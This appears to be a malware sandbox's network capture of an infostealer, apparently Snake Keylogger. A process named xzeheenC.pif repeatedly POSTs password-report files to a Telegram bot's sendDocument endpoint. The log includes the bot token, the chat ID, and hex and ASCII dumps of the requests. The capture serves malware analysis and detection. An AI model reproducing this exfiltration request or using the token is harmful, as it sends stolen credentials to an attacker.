                                                                                                        2024-12-18 15:32:10 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419202,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535930,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        93192.168.2.849870149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:11 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd225621140a82
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:11 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 35 36 32 31 31 34 30 61 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd225621140a82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:11 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:11 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:11 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419204,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535931,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        94192.168.2.849872149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:11 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21957fa780dd
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:11 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 39 35 37 66 61 37 38 30 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21957fa780ddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:12 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:12 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:12 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419206,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535932,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        95192.168.2.849873149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:12 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd231ab10327a5
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:12 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 31 61 62 31 30 33 32 37 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd231ab10327a5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:13 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:12 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:13 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419208,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535932,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        96192.168.2.849878149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:13 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22799af3df8b
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:13 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 37 39 39 61 66 33 64 66 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd22799af3df8bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:13 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:13 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:13 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419210,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535933,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        97192.168.2.849879149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:13 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21b1a0691632
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:32:13 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 62 31 61 30 36 39 31 36 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21b1a0691632Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:14 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:13 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:14 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419212,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535933,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        98192.168.2.849881149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:14 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2362215e27d7
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:14 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 36 32 32 31 35 65 32 37 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2362215e27d7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:15 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:14 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:15 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419214,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535934,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        99192.168.2.849882149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:15 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22aae7254cb3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:15 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 61 61 65 37 32 35 34 63 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd22aae7254cb3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:15 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:15 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
